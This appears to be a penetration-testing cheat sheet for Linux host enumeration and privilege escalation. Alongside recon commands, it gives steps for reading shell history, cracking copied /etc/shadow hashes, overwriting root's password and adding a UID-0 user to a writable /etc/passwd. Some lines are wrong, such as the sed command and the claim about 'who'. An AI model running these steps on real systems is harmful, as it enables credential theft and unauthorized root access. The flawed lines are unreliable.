Host Recon

For automated enumeration of potential PE vectors see here.

Help

# List available commands
compgen -c | sort | less
compgen -a | sort | less

# Help for a specified command
man <command>
<command> --help

Networking

General networking information, such as interfaces, IP addresses, and DNS:

ip addr show
ip a
ifconfig -a # deprecated

# Show interfaces
ip link show

System

pspy can be used on the target to enumerate real-time system information!

# General system information
neofetch
hostnamectl
uname -a

# Name of the host
hostname

# Kernel version & distro info
uname -r
cat /etc/os-release

# Terminal history file
cat ~/.bash_history
cat ~/.zsh_history
history

# Environment variables
printenv
env

# Named pipes
ls -l /proc/sys/fs/pipe-max-size
lsof

# sudo version
sudo --version

# Installed packages

# Debian / Ubuntu (APT-based)
dpkg -l
apt list --installed

# RedHat / CentOS / Fedora (RPM-based)
rpm -qa
dnf list installed
yum list installed

# Arch Linux / Manjaro (Pacman)
pacman -Q

# Snap packages
snap list

# Flatpak packages
flatpak list

# Homebrew (macOS or Linux)
brew list --versions

# List running processes
ps aux

# List the PID and the full command used to start the process
ps -eo pid,cmd

# List root processes
ps -u root -o pid,comm

# Information about a specific process
ps -p <PID> -f
cat /proc/<PID>/status

Users & Groups

# Current user
whoami

# List current user's privileges
sudo -l

# List current user's information
id
getent passwd $(whoami)

# List local users
cut -d: -f1 /etc/passwd
getent passwd

# List active (logged-on) users (works only on Windows Servers)
who

# Elevated permissions
sudo -l

# List current user's groups
groups
id -Gn

# List local groups
getent group

# List group members
getent group <group>

# Check what files the group have permissions on
find / -group filter 2>/dev/null

Files

# List all (including) hidden files
ls -la

# Include subdirectories
ls -laR

# Search for a specific file
locate local.txt
find / -type f -name "local.txt" 2>/dev/null

# Exclude a single directory
find / -path /proc -prune -o -writable -print 2>/dev/null

# Exclude multiple directories
find / \( -path /proc -o -path /var/www \) -prune -o -writable -print 2>/dev/null

# Case-insensitive search
find / -type f -iname "local.txt" 2>/dev/null

# Recursive scan 
grep -riH "password" /path/to/directory

Capabilities split root privileges into discrete actions that can be independently assigned to processes or binaries. This allows granting only the necessary permissions—such as overriding file ownership or binding to privileged ports—without giving full root access.

getcap -r / 2>/dev/null

Check permissions:

ls -l /etc/shadow

If it is writable, create/modify a user:

# Generate a new password hash
openssl passwd -1 -salt xyz newpassword
# Replace root's password with the new one
echo 'root:$1$xyz$YOUR_GENERATED_HASH' | chpasswd -e
# Switch to root
su - root

If it is readable, copy shadow and passwd locally and crack them:

# Unshadow files
unshadow passwd shadow > hashes.txt
# Crack with john
john --wordlist=rockyou.txt hashes.txt
# Crack with hashcat
hashcat -m1800 hashes rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Check the file's permissions:

ls -l /etc/passwd

If it is writable, root's password can be changed:

# Generate a new hash
openssl passwd -1 -salt evil password123

# Place the hash between the first and second ':' of root
sed -i 's/^root:[^:]*:/root:$1$evil$F9LZzU/LJjH7ZQZzJX.Zn1:/' /etc/passwd

# Switch user
sudo su

Or, a new root user can be created:

# Append a new user entry
echo "newroot:\$1\$evil\$F9LZzU/LJjH7ZQZzJX.Zn1:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch user
su newroot

Scheduled Jobs

# Print jobs
crontab -l
cat /etc/crontab
cat /var/log/syslog | grep "CRON"

PreviousLinux NextPrivilege Escalation

Last updated 3 months ago

Was this helpful?